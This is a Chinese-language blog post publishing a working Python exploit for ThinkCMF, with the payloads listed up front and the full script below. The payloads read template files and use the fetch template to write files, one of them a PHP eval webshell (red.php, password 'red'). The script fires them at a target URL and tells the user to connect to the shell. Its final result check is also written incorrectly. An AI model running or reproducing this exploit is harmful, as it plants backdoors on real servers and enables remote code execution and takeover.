一个简单的thinkcmf-exp

这是一个简单的thinkcmfexp,实际上代码只用了requests库就完成了,但是为了使用体验还用了argparse库编写用户友好的命令行接口.下面来说说脚本探测的几个payload.以及用法.

探测以下4个payload:

1
?a=display&templateFile=README.md
1
?a=display&templateFile=config.yaml
1
?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<?php phpinfo();?>')</php>
1
?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('red.php','by:zjun <?php eval($_POST["red"]);?>')</php>

前两个主要判断是否存在网站文件读取漏洞,后两个是文件写入,分别测试写入phpinfophp一句话.

代码使用python3实现,内容极其简单.

目前只写了单个url的检测,没打算写批量,主要用法有-u/--url-h/--help.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
# Author: zjun
# Github: https://github.com/bestreder
# Date: 2020-02-10

import requests
import argparse
from requests.exceptions import RequestException

headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36'
}

def payload_01(url):
try:
response = requests.get((url+'?a=display&templateFile=README.md'), headers = headers, timeout = 5)
if '## README' in response.text:
print ('[+]存在readme.md: {}?a=display&templateFile=README.md'.format(url))
return 0
return 1
except RequestException:
return 2

def payload_02(url):
try:
response = requests.get((url+'?a=display&templateFile=config.yaml'), headers = headers, timeout = 5)
if 'name: thinkcmf' in response.text:
print('[+]存在config.yaml: {}?a=display&templateFile=config.yaml'.format(url))
return 0
return 1
except RequestException:
return 2

def payload_03(url):
try:
response = requests.get((url+"?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<?php phpinfo();?>')</php>"), headers = headers, timeout = 5)
if response.status_code == 200:
response = requests.get((url+'/test.php'), headers = headers, timeout = 5)
if response.status_code == 200:
if 'http://www.php.net' in response.text:
print('[+]phpinfo: {}/test.php'.format(url))
return 0
return 1
return 1
return 1
except RequestException:
return 2

def payload_04(url):
try:
response = requests.get((url+'''?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('red.php','by:zjun <?php eval($_POST["red"]);?>')</php>'''), headers = headers,allow_redirects=False, timeout = 5)
if response.status_code == 200:
response = requests.get((url+'/red.php'), headers = headers,allow_redirects=False, timeout = 5)
if 'by:zjun' in response.text:
print('[+]请连接shell,密码是red: {}/red.php'.format(url))
return 0
return 1
return 1
except RequestException:
return 2

if __name__ == '__main__':
print(r'''
_ _ _ _ __
| |_| |__ (_)_ __ | | _____ _ __ ___ / _| _____ ___ __
| __| '_ \| | '_ \| |/ / __| '_ ` _ \| |_ _____ / _ \ \/ / '_ \
| |_| | | | | | | | < (__| | | | | | _|_____| __/> <| |_) |
\__|_| |_|_|_| |_|_|\_\___|_| |_| |_|_| \___/_/\_\ .__/
|_|
-by:zjun
www.zjun.info
该脚本具有一定误差,请谨慎使用,仅供参考!
''')
parser = argparse.ArgumentParser(description='The exp of thinkcmf')
parser.add_argument('-u', '--url',required=True,help='target url')
args = parser.parse_args()
url = args.url
payload_01 = payload_01(url)
payload_02 = payload_02(url)
payload_03 = payload_03(url)
payload_04 = payload_04(url)
if payload_01 and payload_02 and payload_03 and payload_04 == 2:
print('[-]连接超时:{}'.format(url))
elif payload_01 and payload_02 and payload_03 and payload_04 == 1:
print('[-]初步测试暂不存在thinkcmf漏洞: {}'.format(url))
else:
print('^ _ ^ enjoy it!')

项目地址

Thank you very much if you can.

欢迎关注我的其它发布渠道